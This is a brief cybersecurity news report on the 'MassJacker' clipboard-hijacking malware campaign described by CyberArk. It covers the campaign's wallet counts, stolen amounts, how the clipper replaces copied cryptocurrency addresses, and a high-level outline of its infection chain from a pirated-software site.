A sophisticated clipboard hijacking campaign dubbed ‘MassJacker’ has been discovered using over 778,531 cryptocurrency wallet addresses to steal digital assets from victims’ computers. According to cybersecurity firm CyberArk, approximately 423 wallets connected to this operation contained $95,300 at the time of analysis, though historical transaction data suggests much higher amounts.
Researchers identified a central Solana wallet that appears to function as the operation’s main collection point, having accumulated more than $300,000 in transactions to date. Evidence suggests MassJacker is run by a single threat group, as identical file names and encryption keys were used consistently throughout the campaign, though it could potentially operate under a malware-as-a-service model.
## How MassJacker Works
Unlike traditional cryptojacking that hijacks computing resources for mining, MassJacker employs clipboard hijacking malware that:
– Monitors the Windows clipboard for cryptocurrency wallet addresses
– Replaces legitimate addresses with attacker-controlled ones
– Redirects victim transactions to the attackers’ wallets
These “clippers” are particularly difficult to detect due to their minimal functionality and limited operational scope.
## Technical Infrastructure
The malware distribution chain begins at pesktop[.]com, a site hosting pirated software. When users download software from this site, they unknowingly execute:
1. A CMD script that triggers PowerShell
2. PowerShell fetches an Amadey bot and two loader files
3. Multiple layers of packers decrypt and load subsequent components
4. The final MassJacker payload is injected into the legitimate Windows process ‘InstalUtil.exe’
MassJacker uses regex patterns to identify cryptocurrency addresses in the clipboard and replaces them with addresses from an encrypted list controlled by attackers.
CyberArk urges the cybersecurity community to investigate large-scale operations like MassJacker more thoroughly, as they may reveal valuable intelligence about threat actors despite appearing to cause relatively low financial damage.